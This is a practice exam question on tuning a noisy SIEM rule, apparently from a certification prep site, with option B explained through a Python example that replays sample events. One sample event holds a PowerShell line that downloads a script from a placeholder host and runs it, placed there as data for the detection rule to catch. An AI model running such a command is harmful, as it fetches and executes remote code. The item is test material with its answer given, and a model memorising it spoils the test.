CAS-005
Security Operations
medium
Question 5 of 22

A security analyst notices that the SIEM is generating thousands of alerts per day for a specific rule, but investigation reveals that nearly all of them are benign events from a monitoring agent. Which SIEM management action BEST resolves this without eliminating detection capability?

A. Delete the rule from the SIEM
B. Tune the rule to exclude events from the monitoring agent's known source identifier while preserving alerts for all other sources
C. Increase the SIEM storage capacity to handle the alert volume
D. Forward the excess alerts to a secondary SIEM
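The tuning described in option B, worked through on constructed sample events. This is an added example, not CertQnA's material or any SIEM vendor's rule syntax: the event fields, the "remoting cmdlet in a PowerShell script block" rule, and the agent identity (hypothetical service account `svc-monitor` on hypothetical host `mon-agent-01`) are all assumptions. It also shows why the exclusion should key on the agent's full source identifier rather than on the account name alone.

```python
"""Narrow SIEM rule exclusion, as an added example (not the page's own code).
Assumptions: events are dicts with host/user/event_id/script; event_id 4104
stands in for PowerShell script-block logging; the monitoring agent is the
hypothetical account 'svc-monitor' running only on host 'mon-agent-01'."""
from collections import Counter

# Constructed sample events, not captured logs.
NOISY_SCRIPT = "Invoke-Command -ComputerName $h -ScriptBlock { Get-Counter }"


def make_agent_events(n):
    """The benign flood: the agent polls every host with the same script block."""
    return [{"host": "mon-agent-01", "user": "svc-monitor",
             "event_id": 4104, "script": NOISY_SCRIPT} for _ in range(n)]


SAMPLE_EVENTS = make_agent_events(50) + [
    # Genuine remote execution from an admin workstation: must alert.
    {"host": "ws-017", "user": "jdoe", "event_id": 4104,
     "script": "Invoke-Command -ComputerName dc01 -ScriptBlock { whoami }"},
    # The agent's account used from a host it never runs on: must still alert.
    {"host": "ws-042", "user": "svc-monitor", "event_id": 4104,
     "script": "Invoke-WebRequest http://example.invalid/a.ps1 | iex"},
    # Unrelated script block the rule should never match.
    {"host": "ws-017", "user": "jdoe", "event_id": 4104, "script": "Get-Date"},
    # Different event type from the agent host: out of scope for this rule.
    {"host": "mon-agent-01", "user": "svc-monitor", "event_id": 4688, "script": ""},
]

REMOTING_CMDLETS = ("Invoke-Command", "Invoke-WebRequest")


def base_rule(ev):
    """Original (untuned) rule: a script-block event calling a remoting cmdlet."""
    return ev["event_id"] == 4104 and any(c in ev["script"] for c in REMOTING_CMDLETS)


# Exclusion keyed on BOTH identifiers the agent is known by. Requiring the
# pair, not just the account name, keeps the exclusion from also hiding that
# same service account being used from some other host.
KNOWN_AGENT_SOURCE = {"host": "mon-agent-01", "user": "svc-monitor"}


def is_known_agent(ev):
    return all(ev.get(k) == v for k, v in KNOWN_AGENT_SOURCE.items())


def tuned_rule(ev):
    """Option B: identical detection logic, minus events from the known agent source."""
    return base_rule(ev) and not is_known_agent(ev)


def user_only_rule(ev):
    """Over-broad tuning for comparison: drops the account wherever it appears."""
    return base_rule(ev) and ev["user"] != KNOWN_AGENT_SOURCE["user"]


def run(rule, events):
    return [ev for ev in events if rule(ev)]


def compare(events):
    """Alert count per rule variant, plus which hosts still raise alerts."""
    out = {}
    for name, rule in (("base", base_rule), ("tuned", tuned_rule),
                       ("user_only", user_only_rule)):
        hits = run(rule, events)
        out[name] = {"alerts": len(hits),
                     "hosts": Counter(ev["host"] for ev in hits)}
    return out


if __name__ == "__main__":
    for name, stats in compare(SAMPLE_EVENTS).items():
        print(f"{name:10s} alerts={stats['alerts']:3d} hosts={dict(stats['hosts'])}")
```

On this input the base rule raises 52 alerts, the tuned rule 2 (the admin workstation and the agent account misused from ws-042), and the account-only exclusion 1, because it silently discards the ws-042 event. That last case is the check to run before shipping any exclusion: replay the events you expect to keep alerting and confirm they still do.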

Educational Content — CertQnA practice questions are written against official exam objectives, covering the same domains tested on the real exam. All content is original and independent — not actual exam questions, not affiliated with any certification vendor.
